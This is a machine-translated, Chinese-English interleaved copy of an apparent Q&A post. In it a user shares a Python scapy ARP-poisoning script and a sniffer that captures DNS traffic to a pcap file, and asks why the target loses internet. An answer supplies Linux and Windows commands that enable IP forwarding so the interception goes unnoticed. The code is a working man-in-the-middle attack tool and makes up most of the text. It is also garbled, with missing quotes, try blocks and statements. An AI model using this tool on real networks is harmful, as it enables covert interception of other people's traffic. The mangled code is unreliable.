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windows 10 中的 ARP 欺骗器和数据包嗅探器使用 scapy python 3

[英]ARP spoofer and packet sniffer in windows 10 using scapy python 3

I've tried out many tutorials I've seen on the internet, but none of them seems to work for me.我已经尝试了很多我在互联网上看到的教程,但它们似乎都不适合我。 The Issue is that I can successfully do the ARP poisoning but when I run the sniffer.py script the target computer will loose internet.问题是我可以成功进行 ARP 中毒,但是当我运行 sniffer.py 脚本时,目标计算机将失去互联网。

arp_spoofer.py arp_spoofer.py

from scapy.all import Ether, ARP, srp, send
import argparse
import time
import os
import sys

def _enable_linux_iproute():
    Enables IP route ( IP Forward ) in linux-based distro
    file_path = "/proc/sys/net/ipv4/ip_forward"
    with open(file_path) as f:
        if f.read() == 1:
            # already enabled
    with open(file_path, "w") as f:
        print(1, file=f)

def _enable_windows_iproute():
    Enables IP route (IP Forwarding) in Windows
    from services import WService
    # enable Remote Access service
    service = WService("RemoteAccess")

def enable_ip_route(verbose=True):
    Enables IP forwarding
    if verbose:
        print("[!] Enabling IP Routing...")
    _enable_windows_iproute() if "nt" in os.name else _enable_linux_iproute()
    if verbose:
        print("[!] IP Routing enabled.")

def get_mac(ip):
    Returns MAC address of any device connected to the network
    If ip is down, returns None instead
    ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
    if ans:
        return ans[0][1].src
def spoof(target_ip, host_ip, verbose=True):
    Spoofs `target_ip` saying that we are `host_ip`.
    it is accomplished by changing the ARP cache of the target (poisoning)
    # get the mac address of the target
    target_mac = get_mac(target_ip)
    # craft the arp 'is-at' operation packet, in other words; an ARP response
    # we don't specify 'hwsrc' (source MAC address)
    # because by default, 'hwsrc' is the real MAC address of the sender (ours)
    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
    # send the packet
    # verbose = 0 means that we send the packet without printing any thing
    send(arp_response, verbose=0)
    if verbose:
         # get the MAC address of the default interface we are using
        self_mac = ARP().hwsrc
        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))

def restore(target_ip, host_ip, verbose=True):
    Restores the normal process of a regular network
    This is done by sending the original informations 
    (real IP and MAC of `host_ip` ) to `target_ip`
    # get the real MAC address of target
    target_mac = get_mac(target_ip)
    # get the real MAC address of spoofed (gateway, i.e router)
    host_mac = get_mac(host_ip)
    # crafting the restoring packet
    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
    # sending the restoring packet
    # to restore the network to its normal process
    # we send each reply seven times for a good measure (count=7)
    send(arp_response, verbose=0, count=7)
    if verbose:
        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="ARP spoof script")
    parser.add_argument("target", help="Victim IP Address to ARP poison")
    parser.add_argument("host", help="Host IP Address, the host you wish to intercept packets 
for (usually the gateway)")
    parser.add_argument("-v", "--verbose", action="store_true", help="verbosity, default is True (simple message each second)")
    args = parser.parse_args()
    target, host, verbose = args.target, args.host, args.verbose
        while True:
            # telling the `target` that we are the `host`
            spoof(target, host, verbose)
            # telling the `host` that we are the `target`
            spoof(host, target, verbose)
            # sleep for one second
    except KeyboardInterrupt:
        print("[!] Detected CTRL+C ! restoring the network, please wait...")
        restore(target, host)
        restore(host, target)

# example run:
# python arp_spoof.py --verbose

example run:示例运行:

# python arp_spoof.py --verbose


from pprint import pprint
from scapy.arch.windows import get_windows_if_list
from scapy.all import *

# disable verbose mode
conf.verb = 0

def parse_packet(packet):
    """sniff callback function.
    pkt = packet
    wrpcap('filtered.pcap', pkt, append=True)
    # if packet and packet.haslayer('UDP'):
    #     udp = packet.getlayer('UDP')
    #     udp.show()

def udp_sniffer():
    """start a sniffer.
    interfaces = get_windows_if_list()

    print('\n[*] start udp sniffer')
        filter="udp port 53",
        iface=r'Ethernet', prn=parse_packet

if __name__ == '__main__':

on running the sniffer.py the target machine loses internet.在运行 sniffer.py 时,目标机器会失去互联网。 please any help is highly appreciated.请高度赞赏任何帮助。 Thank you.谢谢你。

if your target is losing connection when you run the arp spoof it means you havent enabled ip forwarding.如果您的目标在您运行 arp 欺骗时失去连接,则意味着您尚未启用 ip 转发。

To enable it on linux: $ sysctl -w net.ipv4.ip_forward=1 To enable it on windows (run as administ): C:> reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /t REG_DWORD /v IPEnableRouter /d 1 /f To enable it on linux: $ sysctl -w net.ipv4.ip_forward=1 To enable it on windows (run as administ): C:> reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /t REG_DWORD /v IPEnableRouter /d 1 /f

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